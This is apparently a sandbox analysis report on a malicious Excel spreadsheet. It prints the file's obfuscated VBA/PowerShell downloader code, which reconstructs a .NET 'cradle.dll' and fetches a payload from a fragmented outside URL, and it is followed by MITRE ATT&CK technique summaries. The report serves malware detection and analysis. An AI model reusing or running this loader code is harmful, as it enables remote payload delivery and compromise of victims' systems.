,0,0,3,32,0,0,0,0,0,5'+'8,148,124,63,2,180'+',198,73,168,1'+'11,105,133,161,93,80,139,0,8,1"

Line	Instruction	Meta Information
45	Function CashN()
46	CashN = ",0,2)+@(0)11+'+'@(1,0,29,0,0,0,0,0,2)+@(0)11+@(1'+',0,38)+@(0)*8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,82,70,111,108,68,89,75,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101'+',109,0,79,98,106,101,99,116,0,81,99,90,'+'113,'+'1'+'07,0,46,99,116,111,114,0,83,121,115,116,101,10'+'9,46,82,117,110,116,105,109,101,46,67,111,10'+'9,112,105,108,101,11'+'4,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,'+'97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,1'+'05,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105'+',98,'+'117,116,101,0,99,1'+'14,97,100,108,101,0,117'+',114,108,0,83,121,1'+'15,11'+'6,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119'+','+'110,108,111,97,100,83,116'+',114,105,110,103,0,0,0,0,0,3,32,0,0,0,0,0,5'+'8,148,124,63,2,180'+',198,73,168,1'+'11,105,133,161,93,80,139,0,8,1"	executed
47	End Function

Function DigitTestOne, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

"83,122,92,86,25,52,224,'+'137,4,0,1,14,14,3,32,'+'0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,'+'112,78,111,110,69,120,99,101,112,116,105,111,110,8'+'4,104,114,111,119,115,1,0,0,0,76,35)+@(0)*8+@(0,0,110,35,0,0,0,32)+@(0)*22+@(96,35)+@(0)*20+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,64)+@(0)*139+@(1,0,16,0,0,0,24,0,0,12'+'8)+@(0)*14+@(1,0,1,0,0,0,48,0,0,128)+@(0)*14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@'+'(0)*8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0'+',78,0,95,0,73,0,78,0,70,0,7'+'9,0,0,'+'0,0'+',0,189,4,239,254,0,0,1)+@(0)*16+@(0,63)+@('+'0)*7+@(4,0,0,0,2)+@(0)*14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0'+',0,0,0,0'+',36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)'+'+@(0)*7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,10"

Line	Instruction	Meta Information
57	Function DigitTestOne()
58	DigitTestOne = "83,122,92,86,25,52,224,'+'137,4,0,1,14,14,3,32,'+'0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,'+'112,78,111,110,69,120,99,101,112,116,105,111,110,8'+'4,104,114,111,119,115,1,0,0,0,76,35)+@(0)8+@(0,0,110,35,0,0,0,32)+@(0)22+@(96,35)+@(0)20+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,64)+@(0)139+@(1,0,16,0,0,0,24,0,0,12'+'8)+@(0)14+@(1,0,1,0,0,0,48,0,0,128)+@(0)14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@'+'(0)8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0'+',78,0,95,0,73,0,78,0,70,0,7'+'9,0,0,'+'0,0'+',0,189,4,239,254,0,0,1)+@(0)16+@(0,63)+@('+'0)7+@(4,0,0,0,2)+@(0)14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0'+',0,0,0,0'+',36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)'+'+@(0)*7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,10"	executed
59	End Function

Function ClenDaataAll, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

"8,'+'0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,'+'0,101,0,68,0,101,0,115,0,99,0,114,0,105'+',0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,'+'1,0,70,0,105'+',0,108,0,101,0,86,'+'0,101,0,114,0,115,0,105,0,111,0,110'+',0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56'+',0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0'+',78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0'+',2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,'+'0,116,0,'+'0,0,32'+',0,0,0,64,0,1'+'1,0,1,0,79,0,114,0'+',10'+'5,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100'+',0'+',108,0,101,0,46,0,100,0,108,0,108'+',0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,1'+'00,0,117,'+'0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0'+',110,0,0,0,48,0,46,0,48,0,4"

Line	Instruction	Meta Information
61	Function ClenDaataAll()
62	ClenDaataAll = "8,'+'0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,'+'0,101,0,68,0,101,0,115,0,99,0,114,0,105'+',0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,'+'1,0,70,0,105'+',0,108,0,101,0,86,'+'0,101,0,114,0,115,0,105,0,111,0,110'+',0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56'+',0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0'+',78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0'+',2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,'+'0,116,0,'+'0,0,32'+',0,0,0,64,0,1'+'1,0,1,0,79,0,114,0'+',10'+'5,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100'+',0'+',108,0,101,0,46,0,100,0,108,0,108'+',0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,1'+'00,0,117,'+'0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0'+',110,0,0,0,48,0,46,0,48,0,4"	executed
63	End Function

Function n6, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

"6,0,48,0,46,0,48,'+'0,0,0,5'+'6,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0'+',105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)*360+@(32,0,0,12,0,0,0,128,51)+@(0)*502));^&(1gY{0}{1}1gY -f('+'1gY{0}{1}1gY-f 0BvS0Bv,0Bvet-It0Bv),0Bvem0Bv) (1gY{2}{1}{0}1gY-f (1gY{1}{0}1gY -f0Bv080Bv,0Bvle:0Bv),(1gY{0}{1}1gY-f0Bvr0Bv,0Bviab0Bv),0BvVa0Bv) (1gY{5}{8}{2}{6}{0}{3}{4}{7}{1}{9}{10}1gY-f 0Bvom/uplo0B'+'v,0Bvi0Bv,0Bv/0Bv,0Bva0Bv,0Bvds/0Bv,'+'0Bvhttp0Bv'+',0Bvbenistora.c0Bv,0Bvaud0Bv,0Bvs:/0Bv,0Bvo.70Bv,0Bvz0Bv'+');hGD{nsK"

Line	Instruction	Meta Information
65	Function n6()
66	n6 = "6,0,48,0,46,0,48,'+'0,0,0,5'+'6,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0'+',105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)360+@(32,0,0,12,0,0,0,128,51)+@(0)502));^&(1gY{0}{1}1gY -f('+'1gY{0}{1}1gY-f 0BvS0Bv,0Bvet-It0Bv),0Bvem0Bv) (1gY{2}{1}{0}1gY-f (1gY{1}{0}1gY -f0Bv080Bv,0Bvle:0Bv),(1gY{0}{1}1gY-f0Bvr0Bv,0Bviab0Bv),0BvVa0Bv) (1gY{5}{8}{2}{6}{0}{3}{4}{7}{1}{9}{10}1gY-f 0Bvom/uplo0B'+'v,0Bvi0Bv,0Bv/0Bv,0Bva0Bv,0Bvds/0Bv,'+'0Bvhttp0Bv'+',0Bvbenistora.c0Bv,0Bvaud0Bv,0Bvs:/0Bv,0Bvo.70Bv,0Bvz0Bv'+');hGD{nsK"	executed
67	End Function

Function n7, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings	Decrypted Strings
"Vqmm>~T\tzfu/nfSmg(f(,udpj/otBftcnzm;^);T\tzfu/nfSmgdfjuopB/ttnfmc^z2/,(h(HZf"

Line	Instruction	Meta Information
69	Function n7()
70	n7 = "Vqmm>~T\tzfu/nfSmg(f(,udpj/otBftcnzm;^);T\tzfu/nfSmgdfjuopB/ttnfmc^z2/,(h(HZf"	executed
71	End Function

Function n8, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings

Decrypted Strings

"TMeTHsKposKpDS1gY()tT1.(1gY{1}{0}1g'+'Y -f0Bvere0Bv,0BvWh'+'0Bv){(^&(1gY{1}{0}1gY -f0BvI0Bv,0BvGC0Bv) (((1gY{1}{2}{3}{0}1gY-f 0Bv_0Bv,(1gY{0}{1}1g'+'Y -f0BvVar0Bv,0Bvia0Bv),0Bvble0Bv,0Bv:{0}0Bv)) -F [cHAR]92)).1gY'+'VasKplUE1'+'gY.1gYnAsKpmE1gY-clike(1gY{0'+'}{1}1gY-f0BvL0Bv,0Bv*o*d0Bv)}tT1.(0Bv%0Bv){(.(0BvGV0Bv) (0Bv_0Bv) -ValueOn).1gYnasKpME1gY}tT1.(1gY{0}{1}{2}1gY -f0BvSe0Bv,0Bvl0Bv,0Bvect0Bv) -La 1).1'+'gYisKpNvsKpoKE1gY((^&(0BvGV0Bv) '+'(1gY{0}{1}1gY -f0BvkM0Bv,0Bvq0Bv)).1gYVAsKplUE1gY)'+';([RFolDYK]::1gYqCsKpzqk1gY.Invoke((.(1gY{0}{1}1gY-f0BvD0Bv,0BvIR0Bv) (((1gY{2}{3}{1}{0}{4}1gY -f'+'0BvNI00Bv,0Bv:O0Bv,0BvVar0Bv,(1gY{1}{0}1'+'gY-f0Bvble0Bv,0Bvia0'+'Bv),0Bv80Bv)) -cREPla'+'CE([cH"

Line	Instruction	Meta Information
76	Function n8()
77	n8 = "TMeTHsKposKpDS1gY()tT1.(1gY{1}{0}1g'+'Y -f0Bvere0Bv,0BvWh'+'0Bv){(^&(1gY{1}{0}1gY -f0BvI0Bv,0BvGC0Bv) (((1gY{1}{2}{3}{0}1gY-f 0Bv_0Bv,(1gY{0}{1}1g'+'Y -f0BvVar0Bv,0Bvia0Bv),0Bvble0Bv,0Bv:{0}0Bv)) -F [cHAR]92)).1gY'+'VasKplUE1'+'gY.1gYnAsKpmE1gY-clike(1gY{0'+'}{1}1gY-f0BvL0Bv,0Bvod0Bv)}tT1.(0Bv%0Bv){(.(0BvGV0Bv) (0Bv_0Bv) -ValueOn).1gYnasKpME1gY}tT1.(1gY{0}{1}{2}1gY -f0BvSe0Bv,0Bvl0Bv,0Bvect0Bv) -La 1).1'+'gYisKpNvsKpoKE1gY((^&(0BvGV0Bv) '+'(1gY{0}{1}1gY -f0BvkM0Bv,0Bvq0Bv)).1gYVAsKplUE1gY)'+';([RFolDYK]::1gYqCsKpzqk1gY.Invoke((.(1gY{0}{1}1gY-f0BvD0Bv,0BvIR0Bv) (((1gY{2}{3}{1}{0}{4}1gY -f'+'0BvNI00Bv,0Bv:O0Bv,0BvVar0Bv,(1gY{1}{0}1'+'gY-f0Bvble0Bv,0Bvia0'+'Bv),0Bv80Bv)) -cREPla'+'CE([cH"	executed
78	End Function

Reset < >

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
Tactics:	Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 7362_8164_(2019.2).xls

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "7362_8164_(2019.2).xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 4609

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 17613

General

VBA Code Keywords

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 107

General